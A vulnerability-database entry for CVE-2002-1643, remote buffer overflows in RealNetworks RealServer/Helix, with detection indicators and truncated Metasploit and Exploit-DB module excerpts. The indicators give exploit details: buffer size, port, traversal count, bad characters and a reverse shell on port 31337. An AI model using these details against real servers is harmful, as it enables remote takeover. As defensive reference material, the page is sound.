CVE-2002-1643
Published: 2002-12-19
Priority: P3 (50), high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 74.32% (99.4th percentile)
Multiple buffer overflows in RealNetworks Helix Universal Server 9.0 (9.0.2.768) allow remote attackers to execute arbitrary code via (1) a long Transport field in a SETUP RTSP request, (2) a DESCRIBE RTSP request with a long URL argument, or (3) two simultaneous HTTP GET requests with long arguments.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | helix_universal_server | — | — |
| realnetworks | helix_universal_server | — | — |
Detection & IOCs (extracted from sources)
- Detect exploit attempts by matching RTSP DESCRIBE requests containing a URI with 560 or more repeated '../' traversal sequences followed by a '.smi' extension
- Detect exploit attempts by matching RTSP SETUP requests with an abnormally long Transport header field
- Detect exploit attempts by matching RTSP DESCRIBE requests with an abnormally long URL argument
- Detect exploit attempts via two simultaneous HTTP GET requests with long arguments targeting RealServer
- Use RTSP OPTIONS probe to fingerprint vulnerable RealServer instances; a Server header in the response indicates a potentially vulnerable target
- Payload bad characters for this exploit include null bytes, newlines, carriage returns, percent signs, dots, forward/back slashes, spaces, colons, ampersands, question marks, and equals signs; filter or alert on percent-encoded shellcode in RTSP URIs
- Exploit sends a 4131-byte buffer over TCP port 554; alert on oversized RTSP request payloads to RealServer
- The Metasploit module targets RealServer versions 7, 8, and 9 across Linux, BSD, and Windows platforms using a single 'Universal' target with no per-platform ROP/return address differentiation
- The exploit module notes that the master rmserver process must be killed to prevent shell disconnect after exploitation
- The Windows shellcode (w32portshell) opens a reverse shell on port 31337; defenders should monitor for unexpected outbound connections on this port from RealServer processes
No detection rules found.
Exploit-DB
RealServer - Describe Buffer Overflow (Metasploit)
exploitdb·2010-08-07
```ruby
##
# $Id: describe.rb 9971 2010-08-07 06:59:16Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/http/client'

class Metasploit3 'RealServer Describe Buffer Overflow',
      'Description' => %q{
          This module exploits a buffer overflow in RealServer 7/8/9
        and was based on Johnny Cyberpunk's THCrealbad exploit. This
        code should reliably exploit Linux, BSD, and Windows-based
        servers.
      },
      'Author' => 'hdm',
      'Version' => '$Revision: 9971 $',
      'References' =>
        [
          [ 'CVE', '2002-1643' ],
          [ '
```
Exploit-DB
RealServer < 8.0.2 (Windows Platforms) - Remote Overflow
exploitdb·2003-04-30
#include
#include
#include
char w32portshell[] =
Exploit-DB
RealServer 7-9 - Describe Buffer Overflow (Metasploit)
exploitdb·2002-12-20
```ruby
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/http'

class Metasploit3 'RealServer Describe Buffer Overflow',
      'Description' => %q{
          This module exploits a buffer overflow in RealServer 7/8/9
        and was based on Johnny Cyberpunk's THCrealbad exploit. This
        code should reliably exploit Linux, BSD, and Windows-based
        servers.
      },
      'Author' => 'hdm',
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'OSVDB', '4468'],
          [ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/20
```
Metasploit
RealServer Describe Buffer Overflow
metasploit
This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers.
No writeups or analysis indexed.
References
- http://www.kb.cert.org/vuls/id/974689
- http://www.nextgenss.com/advisories/realhelix.txt
- http://www.securityfocus.com/archive/1/304203
- http://www.securityfocus.com/bid/6454
- http://www.securityfocus.com/bid/6456
- http://www.securityfocus.com/bid/6458
- http://www.service.real.com/help/faq/security/bufferoverrun12192002.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/10915
- https://exchange.xforce.ibmcloud.com/vulnerabilities/10916
- https://exchange.xforce.ibmcloud.com/vulnerabilities/10917

Published: 2002-12-19